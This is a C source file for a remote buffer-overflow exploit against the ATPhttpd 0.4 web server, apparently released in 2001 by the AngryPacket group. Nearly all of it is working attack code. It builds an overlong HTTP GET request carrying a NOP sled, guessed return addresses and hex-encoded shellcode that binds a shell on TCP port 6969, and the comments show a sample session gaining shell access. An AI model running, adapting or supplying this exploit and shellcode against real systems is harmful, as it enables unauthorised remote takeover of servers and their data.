/* remote exploit for ATPhttpd 0.4 */
/* www: $Id: atphttpd-smack.c,v 1.2 2001/12/16 22:00:57 dmuz Exp $ */
/* $_Id: atphttpd-smack.c,v 1.27 2001/12/15 08:28:24 methodic Exp $ */

/* Another 31336++ codez from AngryPacket */

/*
 * "Tamer Sahin" <ts@securityoffice.net> posted to BUGTRAQ that there
 * was a DoS condition in ATPhttpd on 13 Dec 2001. I downloaded the 
 * source for the hell of it. Ran ye old perl Ax4000|nc and did some 
 * gdb'n and noticed that it said the return address was 0x41414141. 
 * Well that speaks for itself...
 *
 * - dmuz@angrypacket.com
 */

/*
 * developed and tested against OpenBSD. exploit creates a port-binding
 * shell on the remote machine on port 6969 with the uid of the server.
 * try offsets between 5000 and -5000 with increments of 100. -200 worked
 * like a charm for me.
 *
 * ./atphttpd-smack -h 127.0.0.1 -p 80 -o -200
 * [methodic@vulnhost] [~]$ nc localhost 6969
 * whoami
 * methodic
 * id
 * uid=1009(methodic) gid=1009(methodic)
 * ^C punt!
 *
 * mad thankz to vegac who helped me with a lame bug i was over looking
 */

/* this exploit code by methodic with a little from dmuz */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

/* 701 A's to own the EIP */
#define LEN    900
#define NOP    0x90

/* port binding shellcode (6969/tcp) by noir */
long shellcode[]=
{
0x4151c931,0x51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0x90416873
};

unsigned long get_sp(void) {
  __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {

  int sockfd=0, port=0, offset=0;
  int ch, i;
  long retaddr;
  char *host=NULL, http_request[LEN+20];
  char *payload, *ptr=(char *)&shellcode;
  struct sockaddr_in s;

  while ((ch = getopt(argc, argv, "h:p:o:")) != -1) {
    switch (ch) {
      case 'h':
        host = optarg;
        break;
      case 'p':
        port = atoi(optarg);
        break;
      case 'o':
        offset = atol(optarg);
        break;
    }
  }

  printf(">> atphttpd 0.4b exploit, written by angrypacket security crew\n");
  if(!host) {
    usage(argv[0]);
  }
  if(!port) {
    port = 80;
  }

  /* setup socket structure */
  bzero(&s, sizeof(s));
  s.sin_family = AF_INET;
  s.sin_port = htons(port);
  s.sin_addr.s_addr = inet_addr(host);

  if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    perror(" + socket");
    exit(1);
  }

  if(connect(sockfd, (struct sockaddr *)&s, sizeof(s)) == -1) {
    perror(" + connect");
    exit(1);
  }

  /* build c0dez.. */
  payload = (char *)malloc(LEN);

  retaddr = get_sp() - offset;
  printf(" + building payload [retaddr: 0x%lx] [offset: %ld]\n", retaddr, offset);

  /* fill the buffer with return addr's */
  for(i = 0; i < LEN; i += 4)
    *(long *)&payload[i] = retaddr;

  /* fill in some NOPs */
  for(i = 0; i < ((LEN/2) - 100); i++)
    *(payload + i) = NOP;

  /* copy the shellcode and terminate the payload string */
  memcpy(payload + i, ptr, strlen(ptr));
  payload[LEN-1] = '\0';

  bzero(&http_request, LEN+20);
  strcpy(http_request, "GET ");
  strcat(http_request, payload);
  strcat(http_request, " HTTP/1.0\r\n\r\n");
  free(payload);

  printf(" + sending payload to <%s> on port [%d].. ", host, port);
  send(sockfd, http_request, strlen(http_request), 0);
  printf("done\n");
  close(sockfd);

  printf(" + now connect to port 6969 on <%s> (be good!)\n", host);
  printf(">> visit http://sec.angrypacket.com for more security tools\n");

  return(0);

}

int usage(char *progname) {
  fprintf(stderr, "usage: %s -h <target ip> -p <target port> -o <offset>\n", progname);
  exit(0);
}